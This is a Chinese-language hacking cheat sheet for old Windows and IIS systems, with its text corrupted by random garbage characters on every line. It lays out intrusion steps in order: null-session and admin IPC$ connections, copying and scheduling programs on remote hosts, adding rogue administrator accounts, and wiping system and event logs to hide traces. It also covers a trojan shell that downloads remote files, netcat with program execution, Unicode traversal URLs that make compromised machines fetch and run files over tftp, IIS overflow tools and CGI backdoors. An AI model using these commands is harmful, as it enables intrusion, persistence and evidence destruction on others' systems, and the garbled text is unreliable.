网管和黑客都必须知道的命令
�k"7eHSy, 常用的几条NET命令:
.�XB]� X�� CzE�n_Z�Mb (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
Mqtp}<�*@-
E$�>e<
�T (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
��">�QY'r� �D5m\u�$~V (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
k�Z�.�3�\ Bw=[g&+o1@ (查看远程主机时间) net time \\IP地址
`�j<�tI6[e .>'�Z9.Xnk (定时启动某个程序) at \\IP地址 02:18 readme.exe
�yrs3���`/ K��UyJ"q<W (查看共享) net view \\IP地址
L�G|��,g3& �L-R}�O
�8 (查看netbios工作组列表) nbtstat -A IP地址
JAz;�_wS(k Wu&Di�8GhP (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
Z��n0f�gQd r�?��I(me, (这两条把自己增加到管理员组): net user 用户名 密码 /add
r*w��K�Yb� rw2�|1_�AF net localgroup Administrators 用户名 /add
zNf�5�OItx �E�G.C2]Fi (断开连接) net use \\IP地址\ipc$ /delete
6 {Z\cwP)c n_Y]iAo�c` 扫尾:
//�@=�Q!MW ~&�:���R\� del C:\winnt\system32\logfiles\*.*
�sD3|Qj; _�64@z�dL+ del C:\winnt\ssytem32\config\*.evt
\^4$}�@*�] 2A�W{qw�k7 del C:\winnt\system32\dtclog\*.*
(d#�Z�-w�- ZRm\d3�x4� del C:\winnt\system32\*.log
g:M��7/- " OP}p;����( del C:\winnt\system32\*.txt
}AqD0Qd2Hj AyO|9!F@�A del C:\winnt\*.txt
�_[o^2�3Hj ��K:@��=W1 del C:\winnt\*.log
I}��IW�!K� q)�b��?X
^ 一、netsvc.exe
QZox3LM1&. �>NA7,Z2.� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
N�F��!�1)� r![JPh��ei netsvc /list \\IP地址
n^02��@�Aw -�(}1o9e\7 netsvc schedule \\IP地址 /query
Z�|%�2495\ Y`�?X �Fy: netsvc \\IP地址 schedule /start
zp�qNmxmF� # :w2Hf�6Q 二、OpenTelnet.exe
J6ShI��Pc� F:S>�\w�G, 远程启动主机的Telnet服务,并绑定端口到7878,例如:
��]Hy� �PJ ]���/Qy1, OpenTelnet \\IP地址 用户名 密码 1 7878
<,4(3 >�js veg��!mY2& 然后就可以telnet到主机的7878端口,进入DOS方式下:
/$����,=>� D#��1�~�]d telnet IP地址 7878
1T,PC?vr�{ ������_l=� 三、winshell.exe
UiZp�-Y%ki C}'="g^=sl 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
�E�f!p:HBJ gdE�`�UZ\ p Path (查看winshell主程序的路径信息)
S{�T d/�1} jY�+S�,l�D b reBoot (重新启动机器)
�yKEF�ne8^ �,D2_Z���] d shutDown (关闭机器)
hyfnIb�@~} P�ZRn6Tc�� s Shell (执行后你就会看到可爱的“C:\>”)
8�{]Gh 0+ *;E+9^��:V x eXit (退出本次登录会话,此命令并不终止winshell的运行)
{b0&��qV � �8V�hck-wF CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
X6G�kJ
�R $uK"@��Mw 四、3389登陆器,GUI方式登录远程主机的
6n\z53M��k A�'Q��G�TT 五、elsave.exe
_I-VWDC�k� ��\�nAHp�F 事件日志清除工具
H&Y{j��qua ��PF�y�;qk elsave -s \\IP地址 -l "application" -C
SuH.lCF-g� ?VP�!1O�=J elsave -s \\IP地址 -l "system" -C
/
&�D$kxz \R\@t�]�>Y elsave -s \\IP地址 -l "security" -C
33'lZ�u�bV uE#,�c\[�8 执行后成功清除应用程序日志,系统日志,安全日志
t`YZ)�>Ws aC~n�:�0�v 六、hbulot.exe
*�8.@aX��3 �]_: �Tr�H 开启win2kserver和winxp的3389服务
kefv�=n*]l N^(�lU��ba hbulot [/r]
�l()MYuLNV ap�D=>���O 使用/r表示安装完成后自动重起目标使设置生效。
�o�?mX�xL) h`��h>�H
X 七、nc.exe(netcat.exe)
k7|z�$=�zY G�h[`q7B
Q 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
oA�;T�y7s ^h6$>�n�5� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
1~5q���:X� �H4'DL'8�3 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
1�4�n=�"-9 -N�8cj�r4l 参数:
dEd�]U4�9u �B5,QJ� W* -e prog 程序重定向,一旦连接,就执行 [危险!!]
TF0-?�vBWh hdr}!�w�V� -g gateway source-routing hop point[s], up to 8
JV]u(��P�L
��gr�`Ar; -G num source-routing pointer: 4, 8, 12, ...
�[�}Z�Pg3Y j H�.Ju|nO -h 帮助信息
jXY���;V3l �S�AG`�^�t -i secs 延时的间隔
K+@eH#Cv,( ��PL9eU��y -l 监听模式,用于入站连接
�>[H&k8\7n n�^pZXb�;Y -n 指定数字的IP地址,不能用hostname
u2-@?��yt� nz�(q��)"A -o file 记录16进制的传输
leES� YSY: ke9QT#~p!- -p port 本地端口号
;j>Vt�?:Pw v=.z|QD�^1 -r 任意指定本地及远程端口
&H��4uvJ_< (!VMnLlXRK -s addr 本地源地址
xa{<R+�L�R X�m8Z�+�}i -u UDP模式
I51oG:6fR? �J(EaE2��� -v 详细输出——用两个-v可得到更详细的内容
v��-;X�yVx \%Ah^�U)gS -w secs timeout的时间
rI<�nUy P? tSb���?]J -z 将输入输出关掉——用于扫描时
@UpC{M--Wr 八、TFTPD32.EXE
�h-La'}>�? O�[(?.���9 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�RF4��$��� \U!@OX.R'M http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�Ac[|�MBaF S�"P�9Nf?9 然后可以直接令文件运行:
;;Ycuz�QI3 p<�H�TJ�0� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
C,�{F�0-�D ��x����A& 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
pG!(6V-x<E nrTv�=*tDj 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
9P7xoXJ@y �"B9[�cDM& 一、一 Xscan命令行运行参数说明:
�&N"'7bK6n lk[�G;=K:. 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
(}�{_]X�|e oI_o�z0nHk 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
-v;n"�Z�y1 F<�yy>�Wf� xscan -file <主机列表文件名> <检测项目> [其他选项]
q}<.��x8\� �1iNsX��\M 其中<检测项目> 含义如下:
o�NuPP5d[] \6S�M�n6a4 -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
6.�U���"_% Mhe�|�eD#) -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
(�!�ZQ���� rb:<�N�%*t -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
1KTa�bj/�C |jahpji6 -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
='dLsh4P2N u/gm10<OWa -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
(�px*R��~} lx{.H,1�~� [其他选项] 含义如下:
,8c
dX�t
� =5y`(0 I`U -v: 显示详细扫描进度
��B*?�ZE4` �H��va2j<h -p: 跳过Ping不通的主机
G�;��(onJz �y$IaXr�5L -o: 跳过没有检测到开放端口的主机
/[a�|DUoHO n}< ir!ZTO -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
